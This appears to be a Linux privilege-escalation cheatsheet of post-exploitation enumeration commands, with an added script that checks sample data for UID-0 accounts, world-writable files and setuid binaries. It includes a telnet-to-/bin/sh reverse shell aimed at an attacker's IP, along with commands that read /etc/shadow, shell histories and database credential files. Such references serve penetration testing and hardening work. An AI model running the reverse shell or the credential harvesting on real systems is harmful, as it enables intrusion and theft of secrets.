
Privilege Escalation Cheatsheet V1

Operating System
----------------
Distro & version:
    cat /etc/issue
    cat /etc/*-release
    cat /etc/lsb-release

Kernel version:
    cat /proc/version
    uname -a
    uname -mrs
    rpm -q kernel
    dmesg | grep Linux
    ls /boot | grep vmlinuz-

Environment variables:
    cat /etc/profile
    cat /etc/bashrc
    cat ~/.bash_profile
    cat ~/.bashrc
    cat ~/.bash_logout
    env
    set

Is there a printer?
    lpstat -a

Anything interesting in the home directories?
    ls -ahlR /root/
    ls -ahlR /home/

What user information can be found?
    cat ~/.bashrc
    cat ~/.profile
    cat /var/mail/root
    cat /var/spool/mail/root

What's cached? What has the user been doing? Are there any passwords in plain text? What have they been editing?
    cat ~/.bash_history
    cat ~/.nano_history
    cat ~/.atftp_history
    cat ~/.mysql_history
    cat ~/.php_history

Have you got a shell? Can you interact with the system?
    nc -lvp 4444    # Attacker. Input (commands)
    nc -lvp 4445    # Attacker. Output (results)
    telnet [attackers ip] 4444 | /bin/sh | telnet [attackers ip] 4445    # On the target system. Use the attacker's IP and the same two ports as the listeners.

What sensitive files can be found?
    cat /etc/passwd
    cat /etc/group
    cat /etc/shadow
    ls -alh /var/mail/

Applications & Services
-----------------------
Running services, with the user each one runs as:
    ps aux
    ps -ef
    top
    cat /etc/services

Services running as root:
    ps aux | grep root
    ps -ef | grep root

Installed applications & versions:
    ls -alh /usr/bin/
    ls -alh /sbin/
    dpkg -l
    rpm -qa
    ls -alh /var/cache/apt/archives
    ls -alh /var/cache/yum/

Service settings misconfigured? Check whether a known vulnerability applies:
    cat /etc/syslog.conf
    cat /etc/chttp.conf
    cat /etc/lighttpd.conf
    cat /etc/cups/cupsd.conf
    cat /etc/inetd.conf
    cat /etc/apache2/apache2.conf
    cat /etc/my.cnf
    cat /etc/httpd/conf/httpd.conf
    cat /opt/lampp/etc/httpd.conf
    ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'

Scheduled jobs:
    crontab -l
    ls -alh /var/spool/cron
    ls -al /etc/ | grep cron
    ls -al /etc/cron*
    cat /etc/cron*
    cat /etc/at.allow
    cat /etc/at.deny
    cat /etc/cron.allow
    cat /etc/cron.deny
    cat /etc/crontab
    cat /etc/anacrontab
    cat /var/spool/cron/crontabs/root

Communications & Networking
---------------------------
Which NIC(s) does the system have? Is it connected to another network?
    /sbin/ifconfig -a
    cat /etc/network/interfaces
    cat /etc/sysconfig/network

What are the network configuration settings? DHCP server? DNS server? Gateway?
    cat /etc/resolv.conf
    cat /etc/sysconfig/network
    cat /etc/networks
    iptables -L
    hostname
    dnsdomainname

Which other users & hosts are communicating with the system?
    lsof -i
    lsof -i :80
    grep 80 /etc/services
    netstat -antup
    netstat -antpx
    netstat -tulpn
    chkconfig --list
    chkconfig --list | grep 3:on
    last
    w

IP and/or MAC addresses:
    arp -e
    route
    /sbin/route -nee

Is packet sniffing possible? Listen to live traffic:
    tcpdump 'tcp and ((dst host 192.168.1.7 and dst port 80) or (dst host 10.5.5.252 and dst port 21))'
    Note: the general form is tcpdump 'tcp and ((dst host [ip] and dst port [port]) or (dst host [ip] and dst port [port]))'. The two destination filters are joined with "or": a single packet has one destination, so joining them with "and" would never match anything.

Confidential Information & Users
--------------------------------
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
    id
    who
    w
    last
    cat /etc/passwd | cut -d: -f1    # List of users
    grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1 }'    # List of super users
    awk -F: '($3 == "0") {print}' /etc/passwd    # List of super users
    cat /etc/sudoers
    sudo -l

Are there any passwords in scripts, databases, configuration files or log files? Default paths and locations for passwords:
    cat /var/apache2/config.inc
    cat /var/lib/mysql/mysql/user.MYD
    cat /root/anaconda-ks.cfg
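The one-liners above are meant to be typed ad hoc. As an added example (not part of the original cheatsheet), the script below wraps four of the most productive checks into functions that take a path argument, so the same code can be pointed at the live system (/etc/passwd, /etc/cron*, /) or at a constructed sample tree: UID-0 accounts (the "list of super users" commands), accounts with a real login shell, world-writable files (a writable cron script is a root shell waiting to happen), and setuid binaries. The sample passwd file and cron directory built by make_sample are constructed test data, not taken from any real host.

```shell
#!/bin/sh
# Added example, not from the original cheatsheet. Enumeration helpers that
# take a path so they can run against the live system or constructed data.

# Login names of every account whose UID is 0 (root equivalents).
# Comment and blank lines are skipped; fields are ':'-separated.
uid0_users() {
    grep -v -E '^(#|$)' "$1" | awk -F: '$3 == 0 { print $1 }'
}

# Accounts with a usable login shell (anything not ending in nologin/false).
interactive_users() {
    grep -v -E '^(#|$)' "$1" | awk -F: '$7 !~ /(nologin|false)$/ { print $1 }'
}

# Regular files under a directory that any user may write to
# (other-write bit; -002 is the POSIX spelling of o+w).
world_writable() {
    find "$1" -type f -perm -002 2>/dev/null | sort
}

# Regular files with the setuid bit set. Diff the list against a known-good
# baseline; anything unexpected is a privilege-escalation candidate.
suid_files() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# Build a constructed sample tree (fake passwd file plus a cron directory
# containing one world-writable script and one setuid helper) and print its
# path, so the checks can be exercised without root. Not real host data.
make_sample() {
    d=$(mktemp -d)
    cat > "$d/passwd" <<'EOF'
# constructed sample, not a real /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
toor:x:0:0:backdoor:/root:/bin/sh
alice:x:1000:1000:alice:/home/alice:/bin/bash
bob:x:1001:1001:bob:/home/bob:/bin/false
EOF
    mkdir -p "$d/cron"
    printf '#!/bin/sh\necho ok\n' > "$d/cron/backup.sh"
    printf '#!/bin/sh\necho ok\n' > "$d/cron/rotate.sh"
    chmod 0777 "$d/cron/backup.sh"      # world-writable: the finding
    chmod 0755 "$d/cron/rotate.sh"
    cp "$d/cron/rotate.sh" "$d/cron/helper"
    chmod 4755 "$d/cron/helper"         # setuid bit: the finding
    printf '%s\n' "$d"
}

# Stand-alone run over the sample tree. On a real host, pass /etc/passwd to
# the two user checks and /etc/cron* or / to the two find-based checks.
sample=$(make_sample)
echo "UID 0 accounts:";       uid0_users "$sample/passwd"
echo "Interactive accounts:"; interactive_users "$sample/passwd"
echo "World-writable files:"; world_writable "$sample/cron"
echo "SUID files:";           suid_files "$sample/cron"
rm -rf "$sample"
```

Running `suid_files /` on a real host is slow and noisy; redirecting stderr (as the functions do) hides the permission-denied lines, and comparing against a package-manager baseline (dpkg -S, rpm -qf) separates distro-shipped setuid binaries from anything dropped by an administrator.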

@Aacle_
